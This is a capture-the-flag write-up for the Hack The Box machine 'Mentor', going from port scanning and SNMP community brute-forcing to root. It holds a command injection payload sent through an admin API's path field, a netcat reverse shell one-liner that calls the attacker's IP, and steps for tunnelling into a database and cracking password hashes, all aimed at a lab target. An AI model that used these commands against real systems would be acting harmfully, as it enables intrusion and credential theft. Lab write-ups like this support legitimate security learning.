Hackthebox - Mentor
Nmap
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.193
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 10:50 EST
Nmap scan report for 10.10.11.193
Host is up (0.028s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)
|_ 256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/25%OT=22%CT=1%CU=38011%PV=Y%DS=2%DC=I%G=Y%TM=63A874
OS:B2%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 896.09 secondsWe need to change
/etc/hostsfile and add this10.10.11.193 mentorquotes.htb
UDP
I was kinda stuck on emumeration (I had check port 80 but did not think of subdomain enum right away) at first so I did an udp port scan with nmap sudo nmap -T4 -sU 10.10.11.193 and got interesting results.
Note this taught me that it is always worth to do an udp scan as well.
Nmap result
SNMP
Enumeration
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt mentorquotes.htb snmp
snmp-mibs-downloader
sudo apt install snmp-mibs-downloadersudo download-mibssudo vi /etc/snmp/snmp.confwe comment the line "mibs:"
snmp-check
HTTP
We land on this page when visiting http://mentorquotes.htb/
Gobuster does not give anything interesting
Here is the http response header with some infos
API
Let's try subdomain with wfuzz
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://mentorquotes.htb/' -H "HOST: FUZZ.mentorquotes.htb"
Here we get mainly 302 except for the api which gives us a 404. Let's add it in /etc/hosts file
10.10.11.193 mentorquotes.htb api.mentorquotes.htbWe can use gobuster again to find endpoints in this new subdomain. We get interesting results on our api
That's very cool we get the docs of the API http://api.mentorquotes.htb/docs.
We also have an admin endpoint that will be worth having a look at later
We find a username
jamesand their emailjames@mentorquotes.htb
Turns out it has a signup endpoint
I created a user
It seems like we might be able to enumerate users. Let's try this
First we need to login to get and authorization token
Now let's try to see info of user 1
We need to be an admin. Let's see what else we can do
I tried to bruteforce the token with hashcat but it did not go anywhere.
I tried to tamper with it on jwt.io. It was useful to see how it is made but we do not have the key.
Also the common attacks on jwt did not work.
Let's try to play with the signup and see if we could signup another james user. So if we try with username and email it does not work we get a message saying that the user exists already. Using this we can check if the admin user we found when enumerating smtp exists on the api. But it does not so let's keep trying to impersonate james.
I tried different things but nothing worked
Back to SNMP
Let's try to go further with SNMP, maybe we'll have more luck.
We did not try all the possible tools or wordlists.
Let's use onesixtyone with this wordlist
onesixtyone -c wordlist-common-snmp-community-strings.txt 10.10.11.193
Nothing here.
Let's try it also with nmap
sudo nmap -sU --script snmp-brute 10.10.11.193 --script-args snmp-brute.communitiesdb=wordlist-common-snmp-community-strings.txtWe do not get anything more than the public community.
We can use also this tool. I really recommend using a pipenv to install it
sudo apt updatewe update our kalisudo apt install python3-venvwe instal venvpython3 -m venv snmpbrutewe create a new venvsource snmpbrute/bin/activatewe launch itpip install scapyit requires scapy to work properlypython3 snmpbrute.py -t 10.10.11.193 -p 161
It found another community
internal
Once we are done with snmpbrute we can deactivate the env by typing
deactivateLet's run snmpwalk, we will have to put the output in a file, because it is huge
snmpwalk -c internal 10.10.11.193 -v2c > internalenumLet's see whats in the file and make a search on "STRING" it seems to output interesting infos
We find a string that looks like a password
kj23sadkj123as0-d213! Let's try it in our API to see if we get james this way. If it does not work on the API we will try it on ssh.
It works, we get a token!
Let's try our juicy endpoints. It seems to work, we can list the users
Apart from James we also have an svc account
Another interesting endpoint to check is the one that is not in the docs but that gobuster found for us
/admin/.
When we try to access
/admin/checkit says it is not implemented yetWhen we try to access
/admin/backupit does not accept the GET method. Let's try with a post.
It needs a body and we should also change the content type header to application/json. So our request in burp repeater looks like this
We have another info when we get the response. It also need a path.
As it wants a path let's ask it for
/etc/passwd. It seems to work but does not output the file
Let's try to see if it can execute commands. This is the value that we will put in path
/etc/passwd;wget http://10.10.14.5/testAlse before sending the request we need to launch our python http server, this way we will see if it actually checks the file.
python3 -m http.server 80Here is our request
It does get the file!
So now we should try to get a shell. Let's set up a listener
rlwrap nc -lvp 4444So I tried multiple payload from my pentips, pentestmonkey and payloadallthethings
The only one that worked is this one (do not forget the semi colon in the end and put sh and not bash because bash will fail)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f;So we get a shell. It's root, but last time I saw this it was because I ended up in a docker container.
And an ls proves that we indeed are in a docker again
We can grab the user flag from
/home/svc/user.txt
Privilege Escalation
Looking around we find different interesting files.
The
/app/app/db.pyshows the database urlos.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
Note that here we get connection string to the db. The username and pass are
postgres:postgres
Postgresql
With a quick search we can find that default postreSQL port is 5432.
We could try our luck there.
To install chisel on your kali
curl https://i.jpillora.com/chisel! | bashThen you will need to put a chisel binary in your target
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gzget it in your kaligzip -d chisel_1.7.7_linux_amd64.gzextract itpython3 -m http.server 80start your python servwget http://10.10.14.5/chisel_1.7.7_linux_amd64get it from the targetchmod +x chisel_1.7.7_linux_amd64make it executableNow we need to launch a chisel server in our kali
sudo chisel server --port 5555 --reverse
./chisel_1.7.7_linux_amd64 client -v 10.10.14.5:5555 R:5432:172.22.0.1:5432we forward the postgresql port to be able to access it in our kali
psql -h 10.10.14.5 -U "postgres" -p 5432let's try to connect to the database. If you need a refresh on postgresql here is a nice article\llist the database
\c mentorquotes_dbwe connect to the db we wantselect * from "users";
Let's crack svc password in hashcat
hashcat -m 0 hash /usr/share/wordlists/rockyou.txtWe get this password
53f22d0dfa10dce7e29cd31f4f953fd8:123meunomeeivaniWe can now connect in ssh as svc
ssh svc@10.10.11.193which is a more convenient shell.
linepeas
Let's upload linepeas in our target to enumerate
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64python3 -m http.server 80And in our target
wget http://10.10.14.5/linpeas_linux_amd64chmod +x linpeas_linux_amd64./linpeas_linux_amd64Linepeas finds the snmpd conf file. Let's have a look
It contains a password!
SuperSecurePassword123__
SSH as james
Let's try to use it for james
ssh james@10.10.11.193It works!
James' sudo rights
Let's first try sudo -l and if it does not work let's run linepeas again
We get something really interesting! James has sudo rights on
/bin/shLet's try
sudo /bin/shIt works we have a root shell
We can grab the flag
Resources
Last updated